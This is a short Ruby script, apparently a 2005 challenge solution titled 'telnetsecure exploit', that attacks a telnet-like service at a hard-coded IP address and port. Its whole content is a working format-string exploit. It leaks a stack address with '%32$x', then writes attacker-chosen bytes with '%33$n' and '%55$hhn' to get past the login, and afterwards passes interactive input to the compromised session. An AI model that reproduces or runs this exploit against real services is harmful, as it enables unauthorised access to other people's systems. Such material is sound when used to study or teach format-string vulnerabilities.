#!/usr/bin/ruby

# telnetsecure exploit - securitech 2005
# Yoann Guillot

require 'socket'
s = TCPSocket.open('194.158.103.26', 2323)

Thread.new {
	loop do
		x = s.read 1
		break if not x
		print x
		$stdout.flush
	end
}

s.puts '%32$x'
s.puts 'bla'

puts "offset ?"
buf = gets.hex
puts("0x%.8x" % buf)

login = 'black'
h4x  = login + ('x'*(7-login.length))
h4x += '%33$n'
buf += login.length
h4x += (buf & 0xff).chr + ((buf >> 8) & 0xff).chr + ((buf >> 16) & 0xff).chr + ((buf >> 24) & 0xff).chr
h4x += '%.' + (256 - (7 + 4)).to_s + 'x'
h4x += '%55$hhn'
puts ' => ' + h4x.inspect
s.puts h4x
s.puts 'bla'

while l = gets
	s.puts l
end